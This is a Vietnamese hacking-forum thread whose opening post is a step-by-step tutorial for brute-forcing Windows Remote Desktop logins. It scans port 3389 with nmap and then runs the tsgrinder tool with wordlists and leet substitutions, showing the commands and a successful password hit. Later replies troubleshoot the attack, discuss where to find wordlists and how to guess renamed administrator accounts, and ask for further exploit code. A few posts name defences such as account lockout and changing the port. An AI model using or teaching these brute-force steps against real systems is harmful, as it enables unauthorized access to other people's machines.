banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Brute Force Remote Desktop Connection !!!  XML
  [Question]   Brute Force Remote Desktop Connection !!! 17/12/2006 05:21:50 (+0700) | #1 | 30893
seamoun
Advisor

Joined: 04/01/2002 14:05:10
Messages: 357
Offline
[Profile] [PM]
Hôm nay mình sẽ hướng dẫn các bạn cách brute force Remote Desktop. Quá trình thử user và password để cố gắng đăng nhập hệ thống thì không có gì phải suy nghĩa nhiều
đối với một người tấn công, anh ta chỉ việc có một tập hợp từ điển và sử dụng một tool mà tự động đăng nhập và thử lần lượt các password trong world list là xong.
Rất đơn giản thực hiện nhưng lại hiệu quả, bởi vì đa số người quản trị mạng sử dụng các password không phức tạp. Ví dụ đặt password đăng nhập hệ thống của mình là
admin, 123456, 112233, ...v..v. Mọi chuyện đều có thể, nguy cơ bị xâm nhập luôn có thể xảy ra, do vậy không nên loại bỏ bất kỳ khả năng nào. Do đó đặt password login thì cũng nên lưu ý đặt cho strong một chút. Mà strong quá đến lúc mình mình cần nhớ lại để đăng nhập lại quên thì .... smilie(

Remote Desktop là một dịch vụ chạy trên Windows cho phép truy cập từ xa. Dịch vụ này listen trên port 3389. Nếu như bạn thấy không cần thiết cho hệ thống của bạn thì nên disable dịch vụ này cho roài !!!
Demo hệ thống đích có IP: 192.168.1.15
Bước 1:
Đầu tiên ta phải xác định hệ thống đích cần tấn công có dịch vụ Remote Desktop đang chạy hay không?Ở đây mình sử dụng nmap để kiểm tra

Code:
D:\Hacking\nmap>nmap -sT 192.168.1.15 -p 3389

Starting Nmap 4.11 ( http://www.insecure.org/nmap ) at 2006-12-16 11:33 SE Asia
Standard Time
Interesting ports on 192.168.1.15:
PORT     STATE SERVICE
3389/tcp open  ms-term-serv			<-- Dịch vụ này hiện tại đang open
MAC Address: 00:40:CA:25:74:C1 (First Internat'l Computer)

Nmap finished: 1 IP address (1 host up) scanned in 1.172 seconds


....

Bước 2:
Sử dụng công cụ tsgrinder để tiến hành brute force

Code:
D:\Hacking\tsgrinder-2.03>tsgrinder.exe
tsgrinder version 2.03

Usage:
  tsgrinder.exe [options] server

Options:
  -w dictionary file (default 'dict')
  -l 'leet' translation file
  -d domain name
  -u username (default 'administrator'
  -b banner flag
  -n number of simultaneous threads
  -D debug level (default 9, lower number is more output)

Example:
  tsgrinder.exe -w words -l leet -d workgroup -u administrator -b -n 2 10.1.1.1


Những tùy chọn khi sử dụng đã ghi rõ ở trên. Mặc định thì file dict nó có rất ít password để thử, do vậy phải kiếm mấy cái dict trong một số chương trình crack password,
Ở đây mình chỉ lưu ý sử dụng một tính năng hay của tsgrinder là sử dụng tùy chọn -l , mặc định là file leet để chuyển ký tự.
Ví dụ file leet
Code:
l 1	
e 3
t 7
s 5

Tức là gặp ký tự l nó thay thế bằng 1, e thay thế bằng 3, t thay thế bằng 7, s thay thế bằng 5, các bạn có thể bổ sung sự thay thê này để có được những tổ hợp password phức tạp hơn trong quá trình thử. Password: seamoun, nếu sử dụng tùy chọn -l nó sẽ thử thêm một số pass như 5eamoun, s3amoun, 53amoun

Ví dụ một quá trình thử password
Code:
D:\Hacking\tsgrinder-2.03>tsgrinder.exe -l leet -u admin 192.168.1.15
password apple - failed
password appl3 - failed
password app1e - failed
password app13 - failed
password orange - failed
password orang3 - failed
password pear - failed
password p3ar - failed
password monkey - failed
password monk3y - failed
password s3amoun - success! <-- Khà ! khà ! Dzậy là login với user là admin và password là s3amoun (Hix hix đừng thử pass này với YIM của em :)))


Chúc các bạn thành công ! :!smilie smilie
--vickigroup.com--
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 18/12/2006 12:37:16 (+0700) | #2 | 31120
[Avatar]
lonely_Xorhandsome
Elite Member

[Minus]    0    [Plus]
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
[Profile] [PM]
bài viết này của anh hay và thực tế lắm nhưng có điều em chưa biết là khi down tsgrinder thì có sẵn bộ tự điển ? và thông thường thì thời gian anh hack kiểu này mất bao lâu ? nhưng cũng không hẳn biết pass & 3389 opent thì có thể remote desktop được vì user đó fải thuộc group remote desktop và có quyền allow access , em cũng muốn biết ngoài brute force login thì còn những đoạn code exploite nào áp dụng cho các hệ điều phổ biến hiện nay ? nếu anh có mong anh share giúp .
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 18/12/2006 13:19:55 (+0700) | #3 | 31128
seamoun
Advisor

Joined: 04/01/2002 14:05:10
Messages: 357
Offline
[Profile] [PM]
Như anh đã nói ở trên là dict của thằng này ít lắm. Trong file anh gửi có file password.txt thì phải (lấy từ l0phrcrack smilie)) hãy sử dụng tạm cái đó.

Còn hack kiểu này thì chả có gì là phải động não suy nghĩ, nhưng hãy tận dụng những gì mình đang có và đừng e ngại điều gì khi thực hiện (vì có làm thì máy làm chứ không phải mình làm smilie .

Hãy nên sử dụng nó vào mục đích kiểm tra mức độ đặt password của mình có strong hay chưa ? smilie) .
Ngoài cách này ra thì còn rất nhiều cách khác để xâm nhập, một trong những công cụ để test hệ thống đó là metasploit. Anh đã có viết một bài về metasploit và ứng dụng của nó để khai thác lỗi MS06-040 trên diễn đàn, em có thể tham khảo.
--vickigroup.com--
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 18/12/2006 13:45:38 (+0700) | #4 | 31134
[Avatar]
lonely_Xorhandsome
Elite Member

[Minus]    0    [Plus]
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
[Profile] [PM]

seamoun wrote:
Như anh đã nói ở trên là dict của thằng này ít lắm. Trong file anh gửi có file password.txt thì phải (lấy từ l0phrcrack smilie)) hãy sử dụng tạm cái đó.

................
Hãy nên sử dụng nó vào mục đích kiểm tra mức độ đặt password của mình có strong hay chưa ? smilie) .
Ngoài cách này ra thì còn rất nhiều cách khác để xâm nhập, một trong những công cụ để test hệ thống đó là metasploit. Anh đã có viết một bài về metasploit và ứng dụng của nó để khai thác lỗi MS06-040 trên diễn đàn, em có thể tham khảo. 

cảm ơn anh ! em thấy có rất nhiều tool có nhiều dict cho việc crack kiểu này , em thấy có khá nhiều những domail có mở port này trên net ,trước đây em cũng đã thử crack kiểu này rồi nhưng chưa được , em dùng 1 số tool trên net , chứ chua dùng qua tool anh giới thiệu .
em sẽ tìm hiểu về metasploit sau , có gì không hiểu mong anh giúp em nhé !
[Up] [Print Copy]
  [Question]   Brute Force Remote Desktop Connection !!! 18/12/2006 23:42:02 (+0700) | #5 | 31175
[Avatar]
dabu
Elite Member

[Minus]    0    [Plus]
Joined: 03/03/2003 03:31:20
Messages: 226
Offline
[Profile] [PM]
Em mới test thử thỉ thấy .
Khi chạy file tsgrinder thì màn hình Remote Desktop xuất hiện, nhưng xuất hiện lỗi sau:

C:\>tsgrinder.exe -w dict -l leet -u admin 192.168.49.103
timed_Event_send_recv: Wait failed: TIMEOUT
Couldn't get handle to client window

Coi biến timed_Event_send_recv trong các file không thấy, vậy lỗi này là bị gì anh?

It's time to build a new network.
[Up] [Print Copy]
  [Question]   Brute Force Remote Desktop Connection !!! 19/12/2006 00:57:30 (+0700) | #6 | 31189
[Avatar]
dabu
Elite Member

[Minus]    0    [Plus]
Joined: 03/03/2003 03:31:20
Messages: 226
Offline
[Profile] [PM]
Sory anh, em chép thiếu file, đã ok rồi smilie
It's time to build a new network.
[Up] [Print Copy]
  [Question]   Brute Force Remote Desktop Connection !!! 19/12/2006 04:52:44 (+0700) | #7 | 31230
mfeng
Researcher

Joined: 29/10/2004 15:16:29
Messages: 243
Offline
[Profile] [PM]
Để chống Brute Force, cách đơn giản nhât là đặt giá trị cho Account lockout threshold trong Group Policy. (gpedit.msc). Account sẽ bị lock nếu password nhập sai quá số lần quy định. smilie
[Up] [Print Copy]
  [Question]   Brute Force Remote Desktop Connection !!! 19/12/2006 09:22:35 (+0700) | #8 | 31271
[Avatar]
learn2hack
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 16:32:37
Messages: 825
Offline
[Profile] [PM] [WWW]
Chương trình này hay tuyệt anh à. Em thử rồi, thấy ok!

Nhưng mà có chỗ này nó làm chưa ngon lắm, là cái báo success ko phải là cái password, mà cái ngay trước nó mới đúng!
À, đó là cách quét password khi biết user (mặc định là administrator), vậy có cách nào quét được các users trên máy đó không anh?
Blog: http://hontap.blogspot.com
Tải phần mềm miễn phí: http://www.taiphanmem.org
[Up] [Print Copy]
  [Question]   Brute Force Remote Desktop Connection !!! 19/12/2006 13:14:50 (+0700) | #9 | 31303
[Avatar]
nhatminh1209
Member

[Minus]    0    [Plus]
Joined: 25/01/2005 08:55:11
Messages: 102
Offline
[Profile] [PM]
Oài, đây là mình có dict của nước ngoài có sẵn, còn ở Việt Nam gặp phải bác nào đặt pass : toiyeuemvitoiquyem hay hoangtuaudition thì .... đứt cước. chẹp chẹp
[Up] [Print Copy]
  [Question]   Brute Force Remote Desktop Connection !!! 19/12/2006 13:39:41 (+0700) | #10 | 31308
[Avatar]
lonely_Xorhandsome
Elite Member

[Minus]    0    [Plus]
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
[Profile] [PM]

light.phoenix wrote:
Để chống Brute Force, cách đơn giản nhât là đặt giá trị cho Account lockout threshold trong Group Policy. (gpedit.msc). Account sẽ bị lock nếu password nhập sai quá số lần quy định. smilie 

đúng ý tớ rồi đấy , chỉnh nó sau 3 lần login sai là lock 30 phút hihihihi , với cách này thì dict không còn gì để crack nữa .
[Up] [Print Copy]
  [Question]   Brute Force Remote Desktop Connection !!! 20/12/2006 06:32:46 (+0700) | #11 | 31455
aoden227
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 21:41:59
Messages: 42
Offline
[Profile] [PM]
sao cái này mình kiểm tra chính máy mình ko được thế nhỉ?
nó cũng hiện ra như bạn dabu
C:\>tsgrinder.exe -w dict -l leet -u admin 192.168.1.48
timed_Event_send_recv: Wait failed: TIMEOUT
Couldn't get handle to client window

còn kiểm tra máy trong mạng lan thì chỉ hiện ra cái bảng logon vào nhưng nó cư failed mãi

trong khi mình đăng nhập máy kia nó chẳng có pass gì cả.
[Up] [Print Copy]
  [Question]   Brute Force Remote Desktop Connection !!! 20/12/2006 09:38:38 (+0700) | #12 | 31502
[Avatar]
learn2hack
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 16:32:37
Messages: 825
Offline
[Profile] [PM] [WWW]
Công cụ Remote mà bạn lại kiểm tra trên máy mình thì hèn gì không được là đúng rồi.
Còn muốn kiểm tra trên máy khác, bạn phải đặt mật khẩu cho 1 tài khoản nào đó trên máy kia chứ. Remote Desktop chỉ làm việc với những tài khoản có mật khẩu thôi. Sau đó thì thêm mật khẩu đó vào file từ điển xem nó có hoạt động đúng không.
Blog: http://hontap.blogspot.com
Tải phần mềm miễn phí: http://www.taiphanmem.org
[Up] [Print Copy]
  [Question]   Brute Force Remote Desktop Connection !!! 20/12/2006 12:50:48 (+0700) | #13 | 31539
[Avatar]
lonely_Xorhandsome
Elite Member

[Minus]    0    [Plus]
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
[Profile] [PM]

learn2hack wrote:
Công cụ Remote mà bạn lại kiểm tra trên máy mình thì hèn gì không được là đúng rồi.
Còn muốn kiểm tra trên máy khác, bạn phải đặt mật khẩu cho 1 tài khoản nào đó trên máy kia chứ. Remote Desktop chỉ làm việc với những tài khoản có mật khẩu thôi. Sau đó thì thêm mật khẩu đó vào file từ điển xem nó có hoạt động đúng không. 

nếu dùng win server thì test trên máy của mình được hết !
[Up] [Print Copy]
  [Question]   Brute Force Remote Desktop Connection !!! 21/12/2006 01:10:48 (+0700) | #14 | 31621
aoden227
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 21:41:59
Messages: 42
Offline
[Profile] [PM]

learn2hack wrote:
Công cụ Remote mà bạn lại kiểm tra trên máy mình thì hèn gì không được là đúng rồi.
Còn muốn kiểm tra trên máy khác, bạn phải đặt mật khẩu cho 1 tài khoản nào đó trên máy kia chứ. Remote Desktop chỉ làm việc với những tài khoản có mật khẩu thôi. Sau đó thì thêm mật khẩu đó vào file từ điển xem nó có hoạt động đúng không. 


hic hic mình đặt pass cho máy kia rùi tạo luôn user mới cho nó,thế mà vẫn chẳng successfull.lúc mình remote mình bật máy kia lên có làm sao ko thế? máy mình cài win 2000 pro máy kia win XP ko biết có làm sao ko nhỉ chán quá hic hic
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 29/04/2008 21:47:25 (+0700) | #15 | 128111
hoangsakura
Member

[Minus]    0    [Plus]
Joined: 26/12/2006 21:19:16
Messages: 4
Offline
[Profile] [PM]
cái này hên xui. nếu admin gà đặt pass theo kiểu 123456 hoặc tên diễn viên ca sĩ thì may ra ăn đc. còn ko thì bó tay
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 29/04/2008 23:35:54 (+0700) | #16 | 128140
[Avatar]
thephatcompany
Member

[Minus]    0    [Plus]
Joined: 27/02/2008 15:13:47
Messages: 453
Offline
[Profile] [PM] [WWW] [Yahoo!]
Anh coi lại bản down nhé, có HackTool.Win32.TSGrinder.a. Thank
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 30/04/2008 00:01:26 (+0700) | #17 | 128151
[Avatar]
nha_ngheo
Member

[Minus]    0    [Plus]
Joined: 11/08/2005 08:32:36
Messages: 16
Location: BN-HN
Offline
[Profile] [PM]
mình dùng Win2k3 server, remote bằng administrator đâu có cần pass, remote trong LAN nhé, chưa test ngoài internet
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 30/04/2008 02:11:55 (+0700) | #18 | 128177
[Avatar]
quanta
Moderator

Joined: 28/07/2006 14:44:21
Messages: 7265
Location: $ locate `whoami`
Offline
[Profile] [PM]

nha_ngheo wrote:
mình dùng Win2k3 server, remote bằng administrator đâu có cần pass, remote trong LAN nhé, chưa test ngoài internet 

Remote đến máy nào trong LAN, máy đó có đặt password không?
Let's build on a great foundation!
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 30/04/2008 02:31:12 (+0700) | #19 | 128181
mR.Bi
Member

[Minus]    0    [Plus]
Joined: 22/03/2006 13:17:49
Messages: 812
Offline
[Profile] [PM] [WWW]

nha_ngheo wrote:
mình dùng Win2k3 server, remote bằng administrator đâu có cần pass, remote trong LAN nhé, chưa test ngoài internet 


User và password của 2 administrator này hoàn toàn giống nhau, hoặc cà 2 administrator này đều ko có password thì cần gõ pass làm gì smilie

All of my life I have lived by a code and the code is simple: "honour your parent, love your woman and defend your children"
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 30/04/2008 23:17:02 (+0700) | #20 | 128314
Mr.Khoai
Moderator

Joined: 27/06/2006 01:55:07
Messages: 954
Offline
[Profile] [PM]

thephatcompany wrote:
Anh coi lại bản down nhé, có HackTool.Win32.TSGrinder.a. Thank 

Vậy thì có gì coi lại? Xin bạn suy nghĩ thật kỹ trước khi trả lời.

khoai
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 04/05/2008 07:22:05 (+0700) | #21 | 128773
maumuadong
Member

[Minus]    0    [Plus]
Joined: 04/06/2005 07:48:53
Messages: 32
Offline
[Profile] [PM]
Anh em ơi cái này xài làm sao được, nói chung đi Hack trẻ con thôi. Em dùng rồi, hình như viết bài để chơi thôi thì phải.
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 04/05/2008 13:44:50 (+0700) | #22 | 128844
mR.Bi
Member

[Minus]    0    [Plus]
Joined: 22/03/2006 13:17:49
Messages: 812
Offline
[Profile] [PM] [WWW]
Bạn "xài" như thế nào mà bảo "xài làm sao được" vậy? Nói có sách, mách có chứng, tham gia diễn đàn gần 3 năm rồi mà nói ra những câu như thế ko thấy ngượng à?

Cách Brute force này phụ thuộc vào 3 điểm quan trọng:
1. Remote Desktop có được bật ko? Nếu kiểm tra bằng nmap ko thấy gì, bỏ cuộc
2 Account Administrator còn có tên là Administrator ko hay bị đổi sang 1 tên khác, nếu đổi thì thất bại.
3. Admin có config giá trị Account logout threshold trong Group Policy ko?

Cả 3 điểm này người dùng thường ko chú ý và bỏ qua, do vậy cách này hoàn toàn có thể thực hiện được.
All of my life I have lived by a code and the code is simple: "honour your parent, love your woman and defend your children"
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 05/05/2008 23:00:09 (+0700) | #23 | 129008
[Avatar]
vikjava
Elite Member

[Minus]    0    [Plus]
Joined: 28/06/2004 02:32:38
Messages: 926
Location: NQN
Offline
[Profile] [PM]
mr.Bi có thể giải thích giùm mình tại sao:

2. Account Administrator còn có tên là Administrator ko hay bị đổi sang 1 tên khác, nếu đổi thì thất bại.

thanks!
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 07/05/2008 21:17:37 (+0700) | #24 | 129393
[Avatar]
blueocean89
Member

[Minus]    0    [Plus]
Joined: 31/08/2007 12:06:33
Messages: 156
Location: r00f
Offline
[Profile] [PM]

vikjava wrote:
mr.Bi có thể giải thích giùm mình tại sao:

2. Account Administrator còn có tên là Administrator ko hay bị đổi sang 1 tên khác, nếu đổi thì thất bại.

thanks! 


Nếu ta biết tên tài khoản quản trị của máy tấn công thì coi như dễ dàng thực hiện với tùy chọn -u [chỉ còn vụ passwd thôi] nhưng nếu ngược lạ thì lại sinh thêm vụ mò tài khoản smilie
trons pacrette tiolpsatem otkin ypacs
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 08/05/2008 01:54:09 (+0700) | #25 | 129438
mR.Bi
Member

[Minus]    0    [Plus]
Joined: 22/03/2006 13:17:49
Messages: 812
Offline
[Profile] [PM] [WWW]

vikjava wrote:
mr.Bi có thể giải thích giùm mình tại sao:

2. Account Administrator còn có tên là Administrator ko hay bị đổi sang 1 tên khác, nếu đổi thì thất bại.

thanks! 

Bác cứ hỏi vặn em smilie

Nhận định đó của em sai, em ko để ý tsgrinder có option -u, xin lỗi.
All of my life I have lived by a code and the code is simple: "honour your parent, love your woman and defend your children"
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 08/05/2008 02:53:21 (+0700) | #26 | 129455
[Avatar]
vikjava
Elite Member

[Minus]    0    [Plus]
Joined: 28/06/2004 02:32:38
Messages: 926
Location: NQN
Offline
[Profile] [PM]
@blueocean89 : vậy khi người quản trị rename user măc định administrator thành một cái gì khác thì bác dùng cách nào, phương pháp nào nhận biết nó là thằng quản trị . Bác chia sẽ vụ mò này một tí hén... thanks
@mr.Bi : smilie smilie
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 08/05/2008 04:40:11 (+0700) | #27 | 129489
mR.Bi
Member

[Minus]    0    [Plus]
Joined: 22/03/2006 13:17:49
Messages: 812
Offline
[Profile] [PM] [WWW]

vikjava wrote:
@blueocean89 : vậy khi người quản trị rename user măc định administrator thành một cái gì khác thì bác dùng cách nào, phương pháp nào nhận biết nó là thằng quản trị . Bác chia sẽ vụ mò này một tí hén... thanks
@mr.Bi : smilie smilie  


_option -u của tsgrinder chỉ dùng để chỉ định user để brute force, em vừa mới test xong, vừa viết bài này vừa test.

_option này ko dùng để scan username được, nếu sử dụng câu lệnh

Code:
C:\tsgrinder\tsgrinder -w dict -l leet -d workgroup -u 10.0.0.2


thì mặc định tsgrinder sẽ brute force password của của user là Administrator chứ ko phải list tất cả user có trên máy
Nếu: Tsgrinder dùng option -u để list user thì chỉ cần

Code:
C:\tsgrinder\tsgrinder -u 10.0.0.2


là được, nhưng tsgrinder ko có chức năng này.

Vậy đính chính lại nhận định số 2 của em là đúng smilie , ko biết bác còn cao kiến khác ko?

Câu hỏi bác dành cho blueocean89 em cũng ko trả lời được.

Có tìm thấy một topic rất hay về brute force dùng tsgrinder và secure Remote Desktop Connection
http://www.msterminalservices.org/articles/Brute-Force-Hacking-Terminal-Server-Environments.html
để củng cố thêm nhận định của mình.





All of my life I have lived by a code and the code is simple: "honour your parent, love your woman and defend your children"
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 13/05/2008 03:10:31 (+0700) | #28 | 130208
[Avatar]
vikjava
Elite Member

[Minus]    0    [Plus]
Joined: 28/06/2004 02:32:38
Messages: 926
Location: NQN
Offline
[Profile] [PM]

mR.Bi wrote:

vikjava wrote:
@blueocean89 : vậy khi người quản trị rename user măc định administrator thành một cái gì khác thì bác dùng cách nào, phương pháp nào nhận biết nó là thằng quản trị . Bác chia sẽ vụ mò này một tí hén... thanks
@mr.Bi : smilie smilie  


_option -u của tsgrinder chỉ dùng để chỉ định user để brute force, em vừa mới test xong, vừa viết bài này vừa test.

_option này ko dùng để scan username được, nếu sử dụng câu lệnh

Code:
C:\tsgrinder\tsgrinder -w dict -l leet -d workgroup -u 10.0.0.2


thì mặc định tsgrinder sẽ brute force password của của user là Administrator chứ ko phải list tất cả user có trên máy
Nếu: Tsgrinder dùng option -u để list user thì chỉ cần

Code:
C:\tsgrinder\tsgrinder -u 10.0.0.2


là được, nhưng tsgrinder ko có chức năng này.

Vậy đính chính lại nhận định số 2 của em là đúng smilie , ko biết bác còn cao kiến khác ko?

Câu hỏi bác dành cho blueocean89 em cũng ko trả lời được.

Có tìm thấy một topic rất hay về brute force dùng tsgrinder và secure Remote Desktop Connection
http://www.msterminalservices.org/articles/Brute-Force-Hacking-Terminal-Server-Environments.html
để củng cố thêm nhận định của mình.





 


phần này của câu theo tớ thì nó chẳng ăn nhập gì tới cái nhận định số 2 , nó bị tréo làm sao ấy, cái đoạn mà tớ tô đỏ tớ thấy hơi quái , cậu diễn đã khó hiểu hay tớ kém khó hiểu.Tham số -u để chỉ đinh user chứ list user là sao? mà sau -u câu chẳng có đối tượng gì hết thì để -u ở đó làm gì. theo cái nhận định số 2 của cậu thì nếu user administrator bị rename thì thua , không chơi được. Nhưng cậu không thây là trong cái bài mình họa của anh seamoun thì user là admin chứ khong phải là administrator ah.

Vấn đề ở đây là đầu tiên ta phải xác định cái máy tính đó " sống " , có mở dịch vụ remote desktop không, và quét user trong máy đó ( hoặc dùng cái mặc định là administrator) coi thằng nào là admin. và cuối cùng là cái thư viên phải hơi to một tí.

Đối phó với thằng này như anh mfeng đã nêu 1 giải pháp , đồng thời rename user administrator, đặt pass theo một chuân nhất định. vậy làm thế nào để không cho biêt dịch vụ remote desktop đang mở, không cho quét user trên máy.
Cái nì có vẻ hay hơn ....

p/s : anh em nào biết làm sao tìm đươc cái thư viên to đùng thì chỉ giúp
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 13/05/2008 04:20:33 (+0700) | #29 | 130215
mR.Bi
Member

[Minus]    0    [Plus]
Joined: 22/03/2006 13:17:49
Messages: 812
Offline
[Profile] [PM] [WWW]
Ko, có lẽ em diễn đạt dở chứ ko phải anh kém hiểu đâu.

Nhận định số 2: User Administrator bị rename thì tsgrinder thua. Vì tsgrinder ko có chức năng quét User. Anh Seamon chi định tham số
Code:
D:\Hacking\tsgrinder-2.03>tsgrinder.exe -l leet [color=red]-u admin[/color] 192.168.1.15


vì anh Seamon đã biết trước ở máy 192.168.1.15 có user tên admin smilie , máy của ảnh chẳng lẽ ảnh ko biết?

mà sau -u câu chẳng có đối tượng gì hết thì để -u ở đó làm gì 


Code:
Options:
   -w dictionary file (default 'dict')
   -l 'leet' translation file
   -d domain name
  [color=red] -u username (default 'administrator'[/color]
   -b banner flag
   -n number of simultaneous threads
   -D debug level (default 9, lower number is more output)


nếu sau -u ta ko chỉ định tên một user nào đó, thì mặc định tsgrinder sẽ brute force password của user có tên Administrator.
Em chỉ nói tsgrinder sẽ potay khi user Administrator bị đổi tên vì tsgrinder ko có chức năng quét user có trên máy.
vậy làm thế nào để không cho biêt dịch vụ remote desktop đang mở 


Đổi sang một port khác là xong.
All of my life I have lived by a code and the code is simple: "honour your parent, love your woman and defend your children"
[Up] [Print Copy]
  [Question]   Re: Brute Force Remote Desktop Connection !!! 13/05/2008 05:17:25 (+0700) | #30 | 130223
[Avatar]
gamma95
Researcher

Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa&quot;&gt;
Offline
[Profile] [PM] [ICQ]
nếu sau -u ta ko chỉ định tên một user nào đó, thì mặc định tsgrinder sẽ brute force password của user có tên Administrator.
Em chỉ nói tsgrinder sẽ potay khi user Administrator bị đổi tên vì tsgrinder ko có chức năng quét user có trên máy.
vậy làm thế nào để không cho biêt dịch vụ remote desktop đang mở
Đổi sang một port khác là xong 

Cậu Mr.Bi phán nhiều cái nghe chắc nịch nhể ? smilie
Cánh chym không mỏi
lol
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|